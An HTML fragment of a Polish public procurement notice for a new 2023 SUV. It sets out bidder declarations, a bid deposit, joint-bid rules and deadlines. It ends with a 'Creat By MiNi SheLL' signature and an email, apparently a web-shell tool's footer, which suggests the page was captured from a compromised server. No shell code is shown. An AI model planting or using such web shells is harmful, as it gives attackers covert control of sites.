class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca dołącza:<br/>a) oświadczenie aktualne na dzień składania ofert o braku podstaw do wykluczenia, spełnianiu<br/>warunków udziału w postępowaniu, w zakresie wskazanym przez zamawiającego. Wzór<br/>oświadczenia stanowi załącznik nr 4 do SWZ.<br/>b) oświadczenie o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (wzór oświadczenia<br/>stanowi załącznik nr 10 do SWZ).<br/>c) Specyfikacja techniczna oferowanego samochodu – (Załącznik nr 7 do SWZ).<br/>2) Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia, w postaci:<br/>a) Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 Pzp w zakresie o którym mowa w art. 108 ust.1 pkt 1-4 i 6 oraz art.<br/>109. Pzp; – załącznik nr 5 do SWZ;<br/>b) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (t.j. Dz.U. z 2021 r. poz. 275 ze zm.), z innym wykonawcą, który<br/>złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie<br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 8 do SWZ;<br/>3) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania, wezwać wykonawców do<br/>złożenia wszystkich lub niektórych wyżej wymienionych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>4) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>5) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (t.j. Dz.U. z 2023 r. poz. 57 ze zm.), o ile wykonawca<br/>wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp (załącznik nr 4 do SWZ), dane<br/>umożliwiające dostęp do tych środków.<br/>6) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli podmiotowym<br/>środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o<br/>którym mowa w art. 125 ust. 1 Pzp.<br/>7) Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość<br/>i aktualność.<br/>8) W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty wykonawca dołącza:<br/>a) oświadczenie aktualne na dzień składania ofert o braku podstaw do wykluczenia, spełnianiu<br/>warunków udziału w postępowaniu, w zakresie wskazanym przez zamawiającego. Wzór<br/>oświadczenia stanowi załącznik nr 4 do SWZ.<br/>b) oświadczenie o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (wzór oświadczenia<br/>stanowi załącznik nr 10 do SWZ).<br/>c) Specyfikacja techniczna oferowanego samochodu – (Załącznik nr 7 do SWZ).<br/>2) Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia, w postaci:<br/>c) wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub<br/>usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się<br/>lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik<br/>nr 6 do SWZ;<br/>3) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania, wezwać wykonawców do<br/>złożenia wszystkich lub niektórych wyżej wymienionych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>4) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>5) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (t.j. Dz.U. z 2023 r. poz. 57 ze zm.), o ile wykonawca<br/>wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp (załącznik nr 4 do SWZ), dane<br/>umożliwiające dostęp do tych środków.<br/>6) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli podmiotowym<br/>środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o<br/>którym mowa w art. 125 ust. 1 Pzp.<br/>7) Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość<br/>i aktualność.<br/>8) W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Zamawiający wymaga wniesienia wadium w wysokości: 2000,00 (słownie: dwa tysiące złotych<br/>zero groszy). Wadium należy wnieść przed upływem terminu składania ofert.<br/>2) Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z<br/>2023 r. poz. 462 ze zm.).<br/>3) Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego w BNP PARIBAS nr rachunku: 54 2030 0045 1110 0000 0042 8940 z dopiskiem:<br/>Wadium na zabezpieczenie oferty w postępowaniu pn. Zakup fabrycznie nowego samochodu<br/>osobowego typu SUV rok produkcji 2023.<br/>4) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie<br/>zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu<br/>Zamawiający przechowuje na rachunku bankowym. UWAGA! Wniesienie wadium w inny<br/>sposób niż przelew pochodzący z rachunku bankowego Wykonawcy będzie skutkowało<br/>odrzuceniem oferty!<br/>5) Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP, bez konieczności załączania przez<br/>Zamawiającego jakiejkolwiek dokumentacji do żądania zapłaty.<br/>6) Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2) wiersz<br/>2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego<br/>wystawienia.<br/>7) Wadium musi zabezpieczać ofertę zamówienia przez cały okres związania ofertą.<br/>8) Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy,<br/>lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub<br/>złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie<br/>odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw, z art. 266 Pzp.<br/>9) Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –określenie<br/>przedmiotu zamówienia,<br/>c) kwotę gwarancji/poręczenia,<br/>d) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>10) Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 -5 Pzp.<br/>11) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wniesienie<br/>wadium w formie niepieniężnej w postaci dokumentu gwarancji/poręczenia wystawionego na<br/>jednego z tych Wykonawców, będzie wystarczające dla skutecznego zabezpieczenia oferty<br/>wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo musi być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w Rozdziale V.2.1 SWZ, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>5) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>6) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>7) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy<br/>1) Zamawiający wymaga od Wykonawcy aby zawarł z nim umowę w sprawie zamówienia<br/>publicznego na warunkach określonych w projekcie umowy stanowiącej załącznik nr 3 do SWZ.<br/>2) Zamawiający i wykonawca wybrany w postępowaniu o udzielenie zamówienia obowiązani są<br/>współdziałać przy wykonaniu umowy w sprawie zamówienia publicznego, w celu należytej<br/>realizacji zamówienia.<br/>3) Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie zmian przewidzianych<br/>w dokumentach zamówienia w postaci jasnych, precyzyjnych i jednoznacznych postanowień<br/>umownych. Katalog zmian zawarty jest w projekcie Umowy;<br/>4) Przed zawarciem umowy dopuszczalna jest zmiana sposobu spełnienia świadczenia, jeżeli<br/>wystąpią okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej<br/>oferty, a która spowodowałaby, że doszłoby do zawarcia umowy o świadczenie niemożliwe.<br/>Zmiany sposobu spełnienia świadczenia nie mogą dotyczyć zobowiązań Wykonawcy zawartych<br/>w ofercie, które były oceniane w toku postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy Josephine.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com